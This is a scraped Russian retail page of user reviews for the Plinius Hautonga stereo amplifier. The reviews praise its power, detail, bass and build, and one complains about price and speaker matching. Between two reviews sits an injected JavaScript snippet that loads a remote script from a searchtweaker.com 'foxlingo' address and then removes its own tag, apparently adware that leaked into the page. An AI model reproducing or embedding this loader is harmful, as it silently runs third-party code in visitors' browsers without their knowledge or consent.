0

Сравнение

VIP Club

Авторизуйтесь, чтобы ответить.

Вход  Регистрация 

Отзывы о товаре Стереоусилитель Plinius Hautonga silver

<a href='/product/59231.htm' >Стереоусилитель Plinius Hautonga silver</a>
Интересный усилитель.
Открытое звучание,детальность высочайшая,увесистый бас.Оочень мощная подача-всетаки 200 ват на 8 ом.Собран на японских транзисторах Синикен отсюда прозрачный звук.В комплекте дают даже белые перчатки.Качество сборки очень высокое.Пуль из метала 3мм весит не меньше килограма.Что радует сборка родная не китай.
Я тоже впечатлен усилителем.Интересно что для него нет разницы что играть и классика и метал.Подача мощная с основательным фундаментом в нч.Сцена натуральная.Детальность высокая.Дизайн на пять с плюсом.Оекомендую.
Мне лично понравилась отличная динамика и прозрачность.Очень мощно звучит все таки 200 ват на 8 ом это очень не мало.
Качество сборки превосходное-разьемы немецкие WBT,конденсаторы полипрпиленовые итд.
По звуку универсальный аппарат но особено хорошо подает динамичные стили -хевиметал,классика,сложная электроника!!!
Естественно при такой стоимости надо пользовать баллансное подключение.
Поразило качество изготовления.Сейчас все из Китая.А Plinius Hautonga сборка родная Новаязеландия.Шикарный внешний вид.А что звук он соответствует цене.Мне понравился драв и скорость подачи усилителя.Шикарно играет рок и классику в больших составах.Небольшие составы это семечки для Plinius Hautonga! Звук осязаемый,цельный,плотный с большим колличеством воздуха. Лучше Макинтошей и Электрокомпанита в эту цену.
Звучит увлекательно,открыто,динамично и эффектно.
Очень комфортное басистое звучание с высочайшей детальностью.
Ровный от сверх низа до сверх высоких диаппазон частот.




(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.on load=script.on readystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.on load=null;script.on readystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
Не любую акустику отыгрывает.С Вьеной Акустик совсем печально.АТС тоже озвучивает не на высоте.Цена очень завышена,и не просто,а в три раза,по сравнению с США.
  • 1
Вступайте в закрытый клуб Pult.ru!
Подпишитесь на рассылку
и получите 500 бонусов 👋
Нажимая кнопку «Подписаться», я даю согласие на получение рассылок информационно-рекламного характера и обработку персональных данных.
Вы успешно подписаны!